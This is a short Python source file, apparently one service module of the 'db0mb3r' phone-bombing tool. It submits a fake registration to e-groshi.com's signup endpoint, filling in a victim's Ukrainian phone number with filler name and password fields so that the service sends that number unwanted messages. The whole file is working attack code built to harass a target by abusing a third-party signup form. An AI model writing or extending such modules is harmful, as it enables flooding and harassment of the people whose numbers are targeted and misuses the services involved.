egroshi.py 541 B

12345678910111213141516171819
  1. from db0mb3r.services.service import Service
  2. class EGroshi(Service):
  3. phone_codes = [380]
  4. async def run(self):
  5. await self.post(
  6. "https://e-groshi.com/online/reg",
  7. data={
  8. "first_name": self.username,
  9. "last_name": self.username,
  10. "third_name": self.username,
  11. "phone": self.format(self.formatted_phone, "+** (***) ***-**-**"),
  12. "password": self.password,
  13. "password2": self.password,
  14. },
  15. )